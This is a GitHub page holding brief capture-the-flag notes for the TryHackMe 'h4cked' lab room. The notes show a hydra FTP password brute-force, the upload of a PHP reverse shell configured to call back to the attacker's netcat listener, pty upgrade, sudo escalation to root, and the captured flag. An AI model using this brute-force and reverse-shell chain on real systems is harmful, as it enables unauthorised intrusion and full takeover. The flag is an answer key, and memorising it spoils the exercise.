-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathh4cked
50 lines (39 loc) · 1.65 KB
/
h4cked
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#Task 2 Hack your way back into the machine
hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.169.250
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-07 03:39:05
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.169.250:21/
[21][ftp] host: 10.10.169.250 login: jenny password: 987654321
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-07 03:39:33
jenny:987654321
ftp>get shell.php
ftp>exit
vi shell.php
change myip vs port
$ip = '10.6.88.227'; // CHANGE THIS
$port = 6666;
ftp>put shell.php
on my machine
rlwrap nc -lnvp 6666
curl -s http://10.10.169.250:21/shell.php
on my machine
python3 -c 'import pty; pty.spawn("/bin/bash")'
su jenny
sudo -l
pass:
sudo su
root#find / -type f -name *.txt 2> /dev/null
root#ls /root
root#cd /root/Reptile
root@wir3:~/Reptile#cat flag.txt
ebcefd66ca4b559d17b440b6e67fd0fd
https://netsec.ws/?p=337
https://infosecwriteups.com/tryhackme-h4cked-walkthrough-71b9ba4bad7d
https://infosecwriteups.com/h4cked-tryhackme-writeup-cf40463684c8
https://www.kumaratuljaiswal.in/2021/04/tryhackme-h4cked-walkthrough.html
https://pwnlab.me/en-h4cked-tryhackme-writeup/ <--ok
https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
https://pentestlab.blog/
https://github.com/f0rb1dd3n/Reptile <000 rootkit